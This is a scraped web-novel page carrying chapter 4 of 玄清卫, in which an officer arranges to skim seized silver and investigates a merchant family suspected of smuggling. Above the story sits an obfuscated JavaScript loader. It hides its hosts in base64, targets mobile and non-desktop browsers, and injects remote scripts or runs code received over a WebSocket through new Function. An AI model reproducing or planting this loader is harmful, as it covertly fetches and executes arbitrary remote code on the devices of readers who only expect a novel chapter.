笔趣阁

字:
关灯 护眼
笔趣阁 > 玄清卫 > 第4章 猜测
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第4章 猜测

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
  “明天库房里的那些银钱会有总旗的人过来拉走。你晚上叫弟兄们提前去分装一下,咱们自己截二十五万按老规矩分掉。”
  “留这么多?”
  “多吗?你小子别在我这里演,叫你截多少你就截多少,这种事老子什么时候出过错?”
  “嘿嘿,小旗仁义!属下先替兄弟们谢谢您了!”说着就朝沈浩拱了拱手。
  “不用谢我,都是辛苦钱。不过还是那句话,钱收了咱们得利索点办事对吧?齐家这案子陈总旗下了期限,下月初六前必须拿出结果来,你心里要有个数。”
  “这么快?算算也就十天时间?这种案子不是一般都......”
  沈浩伸手打断道:“你别多问,闷头查就是了,有什么发现立即报给我,明白吗?”
  “我知道了,请小旗放心。”
  两人又聊了几句,王校令突然道:“对了,小旗,您叫我暗中查齐家的底有些眉目了。”
  沈浩抿了口酒,示意对方继续说。
  “小旗,您真是明察秋毫,这齐家的底子果然不简单。您下午走了之后我又去翻了齐家账房,发现他们还藏了一些账本在暗格里,是阴阳账本,两面的数额简直大相径庭,而且进出的财货看起来根本就不是一个正常的生意人家。
  一月初,齐家的毛收入在阳面账本上是三十七万余,可阴面却是负债六万余。其中负债的主要原因是他们进了足足七十万两银钱的原材料,可按照齐家明面上的流水,他们根本用不着这么多的原材料。
  自己的账本为什么要做成阴阳账本?应付衙门?我觉得不像。而且我让衙门的差役带我去看了齐家在城郊的仓库,里面囤的材料和成品绝对不够七十万两银钱,和他们阴面账本上的数额对不上......
  另外我们还在齐家的仓库里发现了一些密室,里面居然存放了不少的制式武器,以及一些违禁材料。”
  等对方讲完,沈浩才放下手里的酒杯,问道:“依你看这齐家背地里在干什么?”
  “走私。属下觉得齐家很有可能在背地里干着走私的勾当。”
  “这件事都有谁知道?”
  “都是属下一人独办的,衙门那几个差役只是带路,我没有让他们进仓库。现在仓库那边我也让人把守了,没有您的手令谁都不能进去。”
  “做得好。这件事不要声张。你明天办好银钱转交的事情之后就再找两个信得过的兄弟继续深挖齐家的底细,不管他们是不是走私我都要弄清楚他们到底是干什么的。”
  ......
  夜深。
  沈浩没有休息,十天的时间很紧,他不想随意浪费。
  “小旗,这里就是齐家的后门,里面的一切我们都没有收拾,还是案发后的样子。”
  “行了,你去办你的事不用陪着我,我自己转转。”
  左右看了看,齐家的后门是在一条空寂的小巷里,左边十丈过一个拐角之后才是正街,右边巷子深邃,看起来应该是沿街各个大宅院的后门通道。
  巷子很宽,过一辆马车都还有富余。
  转身看向门口,比起齐家阔气的正门,后门就普普通通并不显眼。
  推开门,地上一根残破的大腿就印入眼帘。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师